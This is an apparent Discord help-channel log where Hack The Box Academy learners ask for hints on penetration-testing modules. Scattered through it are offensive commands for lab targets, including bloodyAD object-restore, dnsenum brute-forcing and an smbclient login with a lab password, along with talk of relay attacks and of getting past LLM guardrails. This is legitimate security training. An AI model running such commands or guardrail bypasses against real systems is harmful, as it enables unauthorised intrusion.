#modules

the price is based on the tier of the module, they've always been that way

the subscription can be cheaper

I think 5-4 years ago when i had premium sub on the labs, it also generated me about 100 cubes in academy each month, and there was no module that was more expensive than 100 cubes, now lab and academy is separated, and the cube worth is much lower cause new modules are about 500 cubes now?

There used to be Tier III and even Tier IV modules that cost 1000 cubes. Years ago, I studied the OSINT module, which cost 1000 cubes at the time.

No, not all new modules cost 500 Cubes. For example, all AI modules are max Tier II and cost max 100 Cubes.

However, there were also various new Tier 0 modules. You can study these for free. There are currently 31 Tier 0 modules in the Academy

Which NIC's are recommended for this path? Is there a list or something anywhere??

The cyberlabs provides all you need, you don't need any special equipment

You use the provided attacker machine which has its own wireless nics to attack the targets

Ah nice. I thought you maybe needed some hardware, similar to the OffSec WiFi course.

I just watched a walkthrough from ippsec on POV machine from cpts preparation track . However I don’t understand why he used the RunasCs.exe instead of the normal built in runas.exe in windows to execute a command as another user . Can somebody enlight me ?

hello! I'm new to htb and accidentally terminated my pwnbox in the intro module cuz i thought i wouldn't need it for the next exercice (rookie mistake 😭) does this mean I can't do the module till tomorrow?

You can use your own VM at any time to access the machines in the modules. You do not necessarily need the PwnBox.

ah okay, thanks!

Can anyone give a nudge on Windows Lateral Movement Skills Assessment "What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?"

look at the VNC part

Please help

This is the exact challenge:

In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section? 

Hi everyone, could someone help me with the LLM OUTPUT ATTACKS skills assessment? I’ve managed to get an admin key and user:pass but neither works to access the chatbot admin. I’d really appreciate any help you can offer. Thanks in advance!

Can anyone give me a hand with the ai red team spam assessment ? I input a successful code but when running the eval I get o output and no flag. Maybe my model is wrong or something. Has anyone completed this that could dm me and give me a hand or double check my code?

I just watched a walkthrough from ippsec on POV machine from cpts preparation track . However I don’t understand why he used the RunasCs.exe instead of the normal built in runas.exe in windows to execute a command as another user . Can somebody enlight me ?

#boxes

@fathom pendant can you also look at my question?

haven't done the module so i'm not of any use here

also iirc the module is above tier 0; so avoid sharing information that you had to dig up

oke, then I have to wait till someone who have done that module

you also didn't state the module/section name

oke, so you mean Incident Handling Process/Skills assignments ??

yeah; that'll help people be able to look it up in their own notes and help you based off that

Hello is it normal that I can copy paste from linux to RDP session but I can't do the opposite ? Even with +clipboard option ? There is a weird behavior when I copy from RDP and paste to obsidian or host terminal it just crash the application. Does anyone experienced this before ?

the only thing i can suggest for the VT thing is making sure you have the right IP

oke,

im stuck at the Handling/Skills Assignments where I have to lookup a file which begins with the name "Mango" on virustotal
Can somone give me some hints ??

im sure I have the right ip.
I copy paste it from the assignment

are you SURE though

(it may not end in .0) 😉

yep, im very sure

(me saying are you sure is saying that you're wrong)

the first 3 octets are correct; the last is not

you mean of the address I posted earlier in virustotal

yes

oke, then I have to hope openvpn will work

it going on and off in Win11 🙁

oke , found it

but the grader says failed

?

wierd
I did it again with the same name and now it is green 🙂

Some of them I will do tomorrow and then the first module of security analyst done 🙂

And can I have some hints on this one: incident handeling process . skills assignments

+ 2 In the same file (i.e., logs-wazuh.zip), identify the user who executed the suspicious PowerShell command. The format is domain\user. 

I looked several time but I cannot find the user

you are so handsome btw

???

what?

you asked for help

yep

but you said also im so handsome

and i think why say that

Don't be weird.

because that the only way I can help

you just feel bad because I say good things more often

No, you said nothing that contributed to actually helping

I made people days

Or you just confused them

now please be nice or keep channel on topic

Don't tell me what to do lol

And I am being nice.

can confirm ab7v is weird

I think people in the general chat think that your name is more weird

Advanced XSS and CSRF Exploitation Skills Assessment
I'm unable to do csrf could u plz send csrf payload which used?

hey, can anyone help with the "Virtual Host and Subdomain Fuzzing" questions part, i think I'm having issue or maybe doing something wrong I'm stuck at the first question in the "Web Fuzzing" module

Hi everyone, could someone help me with the LLM OUTPUT ATTACKS skills assessment? I’ve managed to get an admin key and user:pass but neither works to access the chatbot admin. I’d really appreciate any help you can offer.

you can DM me if you want

You can DM if you still need help

Read up a little, it's not very direct, but there is information you can use from earlier in that section

tbh i read it again and couldnt find it
tried everything again and couldnt find the password

does it have something with SNMP commands?

Read towards the end of the Shares part of the section

What you're trying to do is documented there, and therein is your missing credential

@wooden hornet can you please obfuscate the answers to the questions in your pics

It's tier zero I think?

it is, but it had answers to the challenge

find won't help you with total packages installed

show?

think in terms of Linux: How are packages managed (there are quite a few ways)

show wasn't installed on the target machine so idk

show isn't it either

oh uh

then idk...

i'm not gonna straight up give you the answer, but I will help you utilize your brain to work your way there

fair lol

well i know i use wc to count it up

but then find "packages"

how do you install something on Linux

like what edxsactlyy is that then

i think its like sudo apt install wtv

sudo for root previlidges

that gets you closer; maybe the man page for apt can help you

hm

reminder what you're searching for is a way to LIST the INSTALLED packages (you may need to make sure you account for an unintended line or two)

alr 🙏

you can also do a quick search for 'how to list packages with apt'

i tried apt list --installed

i tried using the wc -l to count it up

but then uh that wasn't right...

ye apt list --installed wasn't right apparently

The best way to ask questions is to understand what you're actually having trouble with :)
The best way to answer the module questions is to break down what it's asking you to do.
how many total packages are installed on the target system?
This tells us many things about our goal

• how many; we're looking for a number
• packages are installed; we're looking for a way to list packages
• on the target system; we're going to need to connect to the remote system in some form (typically the method is above the question with credentials provided)

it's right

^ bear in mind this

maybe if you use head or tail you can see something from the output that would throw you off by one

ohyes i see

wc -l counts all the lines

which the first line wasn't related to the packages

so i had to subtract 1

ahhh

thanksss!

i hope my advice about breaking down the questions is helpful as well. You had some of the puzzle pieces already you just needed the one last bit

yes it is tyvm

the thing is like that wsasn't explained in the lab though...

i mean the section

let me pull it up, as I recall the module provided a list of common commands (apt list wasn't there, ik) sometimes you have to dig a little deeper into commands to get the most out of them

It was mentioned

apt yeah?

oh then i must've overlooked it

https://academy.hackthebox.com/module/18/section/72

there was a lot happening lol

Aye

Easily done

WHATTT

how did i miss that 💀

aptly put in the 'package management' section

oh im not theire yet

As I said, easily done. When trying to take in so much information, it's easy to miss something simple. Don't feel too bad

ye a previous lab also did something like this

where it didn't teach the parameters so i had to look soime up and then when i did the next section it explained it 😭

Oh..

Ok yeah, I get it

@fathom pendant is your job a real pentester or like a mentor??

remind me what this section's name is @latent niche

just a mentor for the path; it's a 'side' gig

Question in File Descriptors and Redirections, but knowledge in Package Management

the one where i was stuck was the "File Descriptors and Redirections"

LMFAO the only one I DIDN'T click

https://academy.hackthebox.com/module/18/section/79 question, https://academy.hackthebox.com/module/18/section/72 answer

That question doesn't feel like it's in the right place..

hmm maybe they were rearranged at somepoint seeing the sec/#

how do u get mod role for htb?

get this, by being a moderator for the server

oh.

😭

I earned it by being helpful to the community for a while before the big mods said 'sure make them mod'

ah i see

kk jus curious

no prob, Good luck! I think the only other weirdo/oddball question in that whole module is the one pertaining to using cURL to access https://inlanefreight.com as it requires a bit of knowledge on html and how certain tags may link to other resources (i.e. a href=, source=,etc.)

As an aside, if you're using the provided pwnbox I don't believe you'll be able to complete the module if you're on a free account (haven't bought a sub or cubes in the past)

since I think (and it could be an oversight error) that the pwnbox on free accounts can't reach https://inlanefreight.com

i use my own

I remember looking up and finding a solution on the (now sunset) forums that broke down the commands and pipes used

That's public I think Marcie?

Ohh nvm

I'm dumb

ye

limited Internet access on purely free accounts

But we DID have allow rules for that kinda thing

so i'm blaming some form of oversight issue, either IP change or something that wasn't pushed down the allow list

Entirely possible, a lot has changed infra wise

I'll mention it if so

it is definitely something that's irked a few people in the past (and can probably lead to user retention loss due to the supposed free thing not being doable without a sub or spending money)

Confirmed an issue, will mention it internally 😐

Rather late than never and wonder why so many people stop using the platform!

It's not gone behind Cloudflare, so still has its own IP, yeah we'll get that fixed

Ok so yes it mentioned it in the content, but isn't required in order to complete it. Still, I can see how it could be confusing.

https://academy.hackthebox.com/module/18/section/80

Oh, I was still looking at the Getting Started module

Thanks, I've raised it.

❤️

https://forum.hackthebox.com/t/academy-attacking-common-services-attacking-ftp/257166/73?page=2 why should i have to relaunch the machine multiple times just for a chance to have port 2121 open :/

because sometimes services don't launch properly, that's just how it goes sometimes

hi, can I ask for some help on this https://academy.hackthebox.com/module/23/section/513 (CPTS path), I identified place to read /etc/passwd but can not doing the log poisoning to RCE, I do inject payload and verified it got in the log but when execute got nothing, have double-check everything even reset and doing it again

btw, I solve it, nice challenge

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

Please DM me if you can

hello guys, anyone can help with
module DACL Attacks II,
skills assessment
q3: Compromise DC04 and read the flag located at C:\Users\Administrator\Desktop\flag.txt ?

I have got the t** hash, and probably even found the vector, but its not working out, need a little help please

Hi. I'm new to asking questions on Discord. If I am stuck on completing a Hack The Box Academy module, do I ask the question here ?

yes, just be careful not to reveal answers to the skill assessments or information in modules above tier 0

Obviously, I don't want to give the game away. Perhaps you can help me. I'm trying to complete the DNS section in footprinting but for the life of me I can't get question 4. Everytime I try to answer the question, the spawned machine times out (whatever I am doing, takes over 90 minutes to complete). Am I doing something wrong ?

Or am I just being impatient. That could be an answer

you have to try to dig deeper

I think someone needs to take the shovel off me. I've dug as far as I can, but still no luck.

Maybe dig on one of the subdomains you already know, use a large list

I'm digging your clues and information. That's the problem. I'm using the largest list, but the box times out before I get to the answer. I know the answer but I am just having trouble getting it myself. Should I be able to dig to the answer

have u tried query ACL for what permissions you have?

oh wait...

Yes, I did, and found it, but I am getting error when I am trying to move forward

Ngl I cant recall whether or not its poasible to use that tool, try one of the other brute force ones.

As it is a footprinting module, should I enumerate (enum)

Anyone stuck at the final skills assessment of the “LLM Output Attacks” module? Is there something non-obvious that needs to be triggered server-side? I’ve tried all typical output injection and enumeration – no luck so far.

Also, should i be adding the ip address of the target to the /etc/hosts file in my machine?

Hi,
I completed the "Attacking Thick Client Applications" section in "Attacking Common Applications," but I have two questions:

-> Why did we focus specifically on the memory size 0000000000003000?

-> How do we know that we need to focus on that particular area?

Could someone clarify these points for me?

second order confusion:

https://academy.hackthebox.com/beta/module/231/section/2483

I have done the module exercise and accessed the second order IDOR page but WHAT I AM I SUPPOSED TO INTRODUCE IN THE ANSWER INPUT???

there is no flag

always, and yes you should enum

I did the latter but not the former. I will add to /etc/ hosts and redo. I will let you know how I progress

can I dm you ?

I added the ip to the /etc/hosts file as suggested and I did a bit of digging and changed by wordlist, and yes, it worked. Thank you for all your help.

i am doing the module package management (/linux fundamentals) and am trying to install git. however, i looks like https is not really working. i am using th parrot OS VM directly from hackthebox. I can ping google and github, but cannot open it with the firefox browser. how can i fix this https issue? can anybody help me

Can anyone help me with the ai red teamer spam assessment? I uploaded but my results come back null or 0 - maybe my model is wrong but not sure. 🤔 or does anyone want to work together through the path. Let me know or dm me.

can I somehow over come this? I am on a free account with no html knowledge. I got the source code with the ctrl u command, but now idea how I want to filter it. furthermore, I am not quite sure, that I understood it correctly. I need to filter for what exactly?

1: no need for ctrl+u since the task asks you to use curl
2: you need to find a way to break things down line by line so that you can effectively filter 😉

there are some solutions floating out there, I suggest looking for one that explains what it's doing

somehow the curl command is not working for me. I cannot access anything through https. I can ping things like google, not with firefox I cannot access it. I am using the htb VM. Curl doesnt work either. i just get "couldnt connect to server"

I am doing the module filter contents, from Linux fundamentals. So, there is a question that is driving me a bit crazy by now. I think I am not understanding the question. the question is: "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)". I already tried couple of things here. ss -tulnp, systemctl list-unit-files --type=service and I already counted them by hand and with grep -c. I still do not get the correct answer. Can anyone help me here?

for that one there's a target for you to connect to
The question also gives you two things

• No localhost (127.x.x.x)
• IPv4 Only (only x.x.x.x)

Guys I am currently doing the CPTS preparation track machines . And I can make a lot of progress but I almost never can never compromise the machine in my own without a write up . That’s because the machine requires some exploitation steps that Cpts track did not cover or mention at all . An example that I see a lot is the certificate attacks

Is it normal that I struggle ? Or I am doing something wrong ?

this is normal

CPTS path doesn't go over ESC/Cert Attacks

It is normal.
tbh Idk why the track has machines that contain ADCS attacks, but yeah you're good.

aside from ESC-8 i wanna say in password attacks

because they likely contain other elements that fall in line with the path

i.e. 90% relevant 10% not

fairly clear as to why they can't have machines that are 100% in-scope/path

So in the exam I must not expect things that are not taught in the cpts course material right (e.g. advanced certificate attacks )?

Yes I thought about that, but if they released 4-5 boxes that are fully aligned with the path, it would be way better than making people second guess their skills because attacks were not explained in the path.

generally no, there may be a handful of things that you'd have to research. But it's likely that they were mentioned in the course

Yes, you shouldn't.
But keep in mind that researching is still required.

Op thanks

If it's normal, I've also gotten stuck with a machine from the list with only enumeration with Kerberos that isn't visible in the CPTS path, but hey, it's another way of doing things. It's good to take notes on new skills for the future.

The strongest thing you should worry about when doing prep is your methodology

Is there any tool in Linux that can enumerate and restore deleted objects in AD?

BloodyAD

Can you give me the command ? I searched BloodyAD but I want able to find such command

bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del

bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore

Omg thanks I will try them

more info here: https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad

Those do not work brother , I just tried them

Try ldapsearch

i have a problem in the module hacking wordpress in the question: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. i tried every commands but im lost to resolve it, anyone else could help me? thank you very much

relook at wpscan and look up the plugins available for 'unauthenticated file download'

When a user is able to recover a deleted user / object in AD environment ? What kind or privilege / rights are required ?

Best to just say which module/section/question you're on

I don't recall having to do that on any module so far

It’s not a section , it is about a machine I just solved

oh #boxes would probably be better then

i found it

Hey Guys I’m a Little confused, where its says $# -eq 0 do they mean the amount of arguments given to the script? Bcs $0 is the script it self does that count as an argument?

$# is num of arguments, it never counts itself

Yeah I know but I mean $0 = the script but does this count in $#?

see the second half of what I stated; it never counts itself

Ow read to fast ^^

Ty

Are the module specific threads/channels for HTB Academy?
Is there a VPN package for Getting Started - Basic Tools - Banner grabbing?

ok, discovered that we don't need the VPN package to grab the banner to the VM that Getting Started - Basic Tools - Banner gramming. Thanks 🙂

Academy has its own vpn, any module section that requires it will have a download button; as a note you dont need to re-download it every single time

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

Question, if you complete a whole "Job Role Path" do you get some soort of a certificate of that you completed it? I'm thinking of doing the "AI Red Teamer"

just out of curiosity

no, but you can download a student transcript that shows all the modules/paths you completed

thanks that's great!

Is there a way to bookmark individual sections? I know you can favorite whole modules but it would be really nice to keep track of certain sections

Probably with your browser's bookmarks

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

i need help with this question

i tried running netstat -l and its not 100% correct

It is correct, but you may want to check the manual. With that command, you'll be missing some data.

Check the Getting Help section to see how you can find out more information about a command

they didn't cover netstat command int his section either 😭

is this a dif channel?

I meant the section in the module

Sometimes you need to do a little research 🙂

👍

im bouta crash out...

so the question is asking to find the LISTENGING services, ALL interfaces, how many, and once again all

so it tried netstat -l -i -a which shopuld cover all interfaces that are listening but doesn't work...

still getting wrong number

i also did wc -l and removed lines not showing the running services

Hey all,
I'm at the Password Attacks Module, Pass the Certificate. When I attempt to do Pass the Certificate with the printer bug, I get this error from impacket-ntlmrelayx:

File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
    ADCSAttack._run(self)
    ~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

Any Idea what can I do to fix this?

https://github.com/ThePorgs/Exegol-images/issues/367

Thanks

I am afraid of changing my Impacket version and then having issues with other tools.
Would you consider doing:

pipx inject impacket PyOpenSSL==24.0.0 --force

safe? or can it cause other impacket tools to have issues?

not sure, can probably make a venv or something

or make a snapshot and try it out, then you can always revert

Alright. Thanks.

Hi
I am stuck at Attacking Thick Client Applications in Attacking Common Applications
Can anyone help me out?

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

The cammand is: curl https://www.inlanefreight.com/ | grep -Eo "https://.{0,3}.inlanefreight.com[^"']*" | sort -u | wc -l

can someone explain how this is the answer and how come i can't come up with this solution 💀

bro the lab did not say how to do this 😭

i was stuck on the same thing except i didnt even get to go to the website

can someone tell how to answer this qustion?

i've listed SMB shares but i couldn't connect bob's user i've been stuck on this question for almost two days

Always best to mention the module and section along with the question you're on

module: getting started
section service scanning

Re-read the the "Shares" part of that page carefully

i literally read it 3 times and still stuck with this question

Then you missed a key piece of information, they literally give you the password in that section.

i wrote it and couldn't enter the user

i wrote it and couldn't get access to the user

capitalization matters

that's the password

i'll try it even tho i'm sure i wrote it with capitalization

well that's the passwd

i dont know if im missing something but this is what happens when i try to enter the user

works for me

are you including the : or something?

numlock and hitting your numkeys?

yeah i wrote it

i even tried copyingthe password then pasting it

Try restarting the target

it should work

i just started it

Gamers I need to ask a dumb question about a skill assessment. Lmk if I can DM you

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. please help

It was supposed to be broad lol but I’m pretty sure I’ve got it answered

Host Discovery nmap

Add the -A flag in your nmap command
And if the question is why -A then search on google what is -A for.

You can always use "--help"

nmap -O it will tell you the Osparating symptom

You could've just googled this, "nmap Os detection"

actually no

check the reading; there's a way to determine OS by some features of ICMP echo responses

you may need to do some research

hello

does anyone know why I hear some random beeping after some time on VMWare

only when some dialog box has opened and i have to click ok or something

Hi, I need help with this: According to a wikipedia.com snapshot taken on February 9, 2003, how many articles were they already working on in the English version? Answer with the number they state without any commas, e.g., 100000, not 100,000.

I can't access the Wayback Machine and I don't know how to answer that question; I got the previous answers from other sources.

dm

Why?

for this module/section you're not scanning a target, so the -O option is useless

Hello in Introduction to Bash Scripting [Conditional Execution]

How do you answer the Question, i tried both 800980 and 800981 and i'm still getting incorrect answer

both of those numbers are wrong

insert your conditional after the var= portion

it's still giving me 800981

module is above tier 0 so please refrain from sharing your solution

okay sorry can i dm you?

lemme spin up the pwnbox and do it rq but sure

can anyone help me with this error in section dynamic port forwarding with SSH module Pivoting & Tunneling.
Came across this error when trying to use proxychains with msfconsole using rdp_scanner

That was helpful, thank you. I struggled a bit, but it can be solved. The issue is how the call to strcmp is resolved on emulators.
On arm libangler.so is mapped normally so Process.getModuleByName("libangler.so") works well. But on x86_64 the call to strcmp is resolved through the dynamic linker libangler.so > PLT >GOT > libc.so, so the actual execution happens inside libc.so, not inside libangler.so.
searching the offset with ghidra as shown in the module will not work. i solved it by hook strcmp directly in libc.so

if someone needs the script just dm me

Trying to do a few modules before my company cans the product, busy with Pass the Certificate. Never used the pwnbox much, but is it supposed to work or do we need to install additional software on it?

It should just work..

Hey team - working through the Attacking Web Applications with FFUF -> Filtering Results exercises and getting a constant answer rejection. Only two options come up (blurred to prevent spoilers) and neither works. I hit the "Show the Solution" eject button and my commands are correct and even the answer shown in there is being rejected. I reset the IP and used the PwnBox instead of my own machine just to see if that was the issue but the error persists.

Am I doing something wrong?

Hello! Has anyone completed AI Defense module from AI Red Teamer path? I have the skills assessment left and I am stuck with the prompt

they're expecting it as a list with no commas

I swear I tried that too out of frustration but will login now and try again

also not the full name, just the subdomain names

so not a.academy.htb b.academy.htb just a b

Just got it to go - it actually did require the format of *.academy.htb - the hint had the format but the walkthrough didn't - so weird.

ah it's been a minute, mb

Attacking Common Services - Attacking DNS

Looks like there is something wrong with this lab.

cat ./resolvers.txt
10.129.155.25 <<-- that is the target ip per lab

./subbrute.py inlanefreight.com -s ./names.txt -r ./resolvers.txt -p

Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
inlanefreight.com,A,134.209.24.248

Subbrute evidently doesn't see the host in the file, and goes for the system dns.

i see your problem

and it's not resolvers.txt

inlanefreight.com
are you sure that's the domain it wants you to go after? 😉

eh... my goodness

thank you

hello, in SOCKS5 Tunneling with Chisel - Pivoting, Tunneling, and Port Forwarding Module
what is the wrong? ensure there arent any spaces, still wrong answer

try refreshing page and trying again

same error (Incorrect answer!)

the flag should be something like Th3...ng! (obviously not pasting the full flag)

ah

Read the question again

carefully 😉

you are correct, its in the "Documents" path I read it Desktop 😅
thanks @fathom pendant

cough tunnel cough vision gets us all

also you don't need to @ me when you replied to my message

the reply feature pings/notifies by default

deal 🤠

• AI Defense
• Skills Assessment
• Struggle getting tokens
• I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand?

Hi all!

Some on can help ?
Footprinting DNS ?

use recursive search and max big wordlist for dnsenum

dnsenum -p 0 -s 0 --enum inlanefreight.htb --dnsserver DNSIP -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --threads 500 -r

but domain not found (
What i do wrong ?

dm please

Guys who know what the problem. I have index number i just write "ls -i /etc/sudoers" but its still wrong!!! why???

Hi, I am working on „Advanced SQL Injections“ Skill Assessment. Was anyone able to solve the second question with sqlmap? I wrote a custom Tramper Script to replace Apostroph with $$, but that did Not work. Can anyone help?

Youre supposed to write your own script

in the module :
https://academy.hackthebox.com/module/113/section/2164

i slove the task and i find the ip addr that ask for . but when u entre it it say 'Incorrect answer!'

the task : What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
see i find it the ip addr #.#.0.4 (i just hide the answer to fellow the discord server rules )

Are you sure you are doing it the correct way ?

You are using your vm or pwnbox?

I think its correct

idk

The command is correct
The error might be in your way
|| Like instead of target you are finding the index number of your sudoers file ||

It isn't!

Connect to the target

This file is in your pwnbox

Not the one HTB is asking for

There must be credentials given right ? @feral thicket

yes

Connect to the service from that and repeat the same thing

Does that mean it is Not possible to get Code execution with sqlmap in that case? If so, can you explain Why? It seems to be a Basic sql injection when looking at the Java code base.

Not all wordlists are created equal

Attacking Common Services - Attacking DNS

Hey guys, anybody completed this lab recently?

As I don't see any educative value in wasting time waiting if a chosen
bforce dictionary is correct or no, I'm asking here.

Is the "names.txt" wordlist from example below enough? Or do I have to look somewhere else?

./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -p

You can dm me

Just run it and if it works it works if it doesnt it probably fails to bypass the filter list. Either way you need to learn to write custom sqli scripts

Ok to anybody wondering, no the names.txt from below will not solve the lab. I wasted ~2hrs trying that.

./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -p

So that you don't have to waste time for ueducative brooding I have a hint.

Think firercely about which wordlist would do. Fiercely!

Got a question about Network Foundations model, how exactly does Static NAT conserve public IP addresses if it is a one-to-one mapping, where each private IP address corresponds directly to a public IP address? Is it, because home networks use PAT and when there is a need for a server that needs to be facing the Internet then we use Static NAT for that singular server, and the conserving IP addresses part is supposed to be the fact that the other devices still use that one public IP from PAT?

Also does Enter not work to submit a question or is it my problem?

got a question. on Detection & Analysis Stage (Part 1) it asks me to go to TheHive webpage using 10.129.185.188 using port 9000. im using a virtual machine to connect to the academy using openvpn with the downloaded vpn. But the webpage for TheHive is not accessible, I keep getting webpage saying "Unable to connect"

1. http://
2. It can take several minutes to spin up

yes i tried that

oh wow, i been using https

a simple mistake cost my nearly a 3 weeks of suffering

If you have a certain setting it may be trying to auto-upgrade to https

well thank you, it helped

Does anyone have any tips to get the vhost that starts with the prefix "web-" on the Web Fuzzing Module - Virtual Hosts and Subdomain Fuzzing topic? I added the IP to the etc/hosts file, no port, but I don't get any responses when I use gobuster to fuzz for vhosts

You have to add the port to the url when fuzzing.

$ gobuster -u http://<domain>.<tld>:<port> ...

I do but I still don't get any responses

could you provide your whole command and command output?

Here's a screenshot

Try using the domain instead of IP

or add the --domain parameter

where would I add it?

In your command it looks like gobuster is attempting to append-domain where you've provided an ip this creates a problem as what it's essentially doing is checking if: <subdomain>.94.237.63.176 exists, which won't exist so you're not gonna get a response. You need to provide the domain instead of the ip, either through the -u field like I've shown in this message #modules message or through the --domain flag.

w1ldgpt gave you a better answer

The effects of being the main documentor for my team, I try to explain everything in an easy to read way

can i know what causing the session setup faliure?
i used the credentials for the user bob that given in the shares section

i've been trying to solve this for three days and still stuck

Which module and section

module getting started
service scanning

I understand now but I only get a IP when I start a target system

You should also consider that you know the vhost starts with web-, and I don’t think there are a lot of entries in common.txt starting with web-.

try specifying the password in the command directly

I don't understand how I get the domain. Is it the inlanefreight.htb:PORT - that I am adding?

use the domain provided in the module

smbclient -U bob bob:Welcome1 \\10.129.163.55\users
so the command should look like this?

read the manual, I'm not sure the exact syntax

I just don't understand where I get the domain name

it's literally provided in the module

don't worry too much about getting it without it being provided, for now, use what's provided.

inlanefreight.htb doesn't work. Could you give me a hint as to where it is in the module?

can you show me the contents of your /etc/hosts file?

still couldn't gain access to bob's user

$ smbclient -U bob%Welcome1 \\\\10.129.163.55\users

don't provide the user/pass in the cli

or do what w1ld said

They tried earlier didn't work

you're trying too many things to pass info through

It's provided in the question based on the answer format, I've literally shown a screenshot above #modules message

does... does your hosts file have the literal word 'ip' ?

it worked thank you for the help

that'll be your problem if so

Yeah I just realized it wow

1. That's too many entries
2. why do you have the string IP at the start of every line?
3. the format is: <IP(I swear if you put this in as is I will kick you, use the ACTUAL IP, NO PORT)> <domain(see comment in IP)>

also you never specify the port in the hosts file

average helpdesk interaction

No offense but y'all need to comprehend, not just read. ISTG

RTFM? in the age of AI?

also going back through modules; apparently they explain DNS a bit better than they did a year or so ago where it was just like a brief mention without too much of the theory behind it

everything is much better nowadays, they're being spoonfed too much and that's why research and critical thinking is non-existent

Your right. I got the answer

Well to be fair and balanced; the old DNS section of "Information Gathering - Web Edition" left a fair bit to be desired

I like the analogy of GPS rather than phone book

GPS also causing everyone to forget roads

ye but they give an explanation of the analogy that makes sense; navigating without a Map or GPS would be a pain in the ass (i.e. visiting websites purely by their IPs and needing to memorize a bunch of IPs)

navigating without a map or gps also helps retention and memory. Rather than being fed the logic, actually thinking about the logic and coming to a conclusion is far better IMO

ye, it's moreso that the coordinates can be pulled back/abstracted to a county/city/country/etc

my favorite silly fact is that 0.000N,0.000W is in the middle of the ocean

Tools are great but in order to learn humans have to do the hard-part first, then do tool assisted

oh yeah for sure

like understanding what the tool is giving you is more important than the tool itself

Also part of the reason why I usually do exploits manually before doing them automated

i.e. understanding what dig is giving you is more important than the result itself

i.e. what A/AAAA/CNAME/NS/MX/TXT/SOA... Records are

or plugging a function into a calculator

100% agree, we getting off topic though

sure it gets you the answer, but if you don't really get it - you're just relying on a tool

the only tool I 100% rely on is in the mirror

I got rickrolled :))

oh look, forgot that existed

fun fact: I found a similar easter egg in the CPTS exam

Anyone can change Full name in HTB account?

if you can't do what you want in the settings you'd have to reach out to support to see if they can help

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Hello all,
i have been stuck on attacking trust for like 3 days now i can't solve it the question number 2 Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt" from question 1 i abused acl to get admin on the DC and from DC and DC03 there is forest trust i tried sid history injection but its work can any one done this module help

oh yeah the DNS one is great

progress: 6/27 module notes condensed

need a nudge on Wi-Fi Evil Twin Attacks > Wi-Fi Evil Twin Attacks - Skills Assessment

got two out of the 3 questions answred, but the first one got me stuck "What is the password of the Wi-Fi network "PulseGrid-INT"?"

anyone available for dm?

You can DM me

hy @fathom pendant i am right now in exam but facing a particular issue so can i dm you for that i have mailed HTB but i just want to make sure something if it is my issue or networks issue

@cloud urchin if you can help here

If you're in the exam having issues no one in the discord can help you, only the official support on the website or through email can help you.

Okay it is resolved thanks for the reply

Hey, did you find an answer to this?

No SQL errors no nothing

almost as if It's a blind SQL injection, even though the modules never taught or even mentioned "blind"

Hi can someone help me answer the question :
What numerical label uniquely identifies a device on a network?
I've tried with IP adress, MAC adress but its wrong ...

What question/section is this?

Network foundations
DNS

What numerical label uniquely identifies a device on a network?

address has two ds

oh what a mistake, thank you very much 🙂

Anytime 👍🏻

Currently doing the skill assesment of HTB CDSA under the section "Introduciton to incident handling". But the second question is refering to an IP 198, which is not found when using Virustotal and the IP retreived from TheHive under the comment section... am I missing something?

anyone has passed the skill assesment File inclusion? i almost finished the CWES learning path .
i also follow the solution but it dosen't work .. i spawned 3 times the istance for retrying

im trying everything ..but it dosent work also the solution , please someone can help?

Where are you stuck and what have you tried?

i have execute all the steps and when im going for remote execution the php dosen't execute my code injection , and i compare with the solution and is the same . Can i show u in DM ?

Hello, can anyone of you help me solve the footprinting module? I am stuck at verifying users on a system by enumerating SMTP further.

@white knoll please which module challenge are you solving?

https://academy.hackthebox.com/module/23/section/513

Ok

can u help me?

I've been working through Guided Lab: Traffic Analysis Workflow. Instructions say to connect to target and start capturing on ENS224. I do this and only get traffic such as 172.x.x.x. When I check the guided analysis resources, the IPs are 10.x.x.x and completely different to what is on the ENS224 interface. Is something explained incorrectly or should this activity be completed with the file from pcap resources? Or am I just doing it wrong?

Hello
in RDP and SOCKS Tunneling with SocksOverRDP - Pivoting, Tunneling, and Port Forwarding module, its a must o run the powershell as admin?
if yes, what if you have a initial foothold but you didnt escalate your privelege, what you will do ?

not always; it just depends

but i don't recall needing to run PS as admin for the SocksOverRDP bit

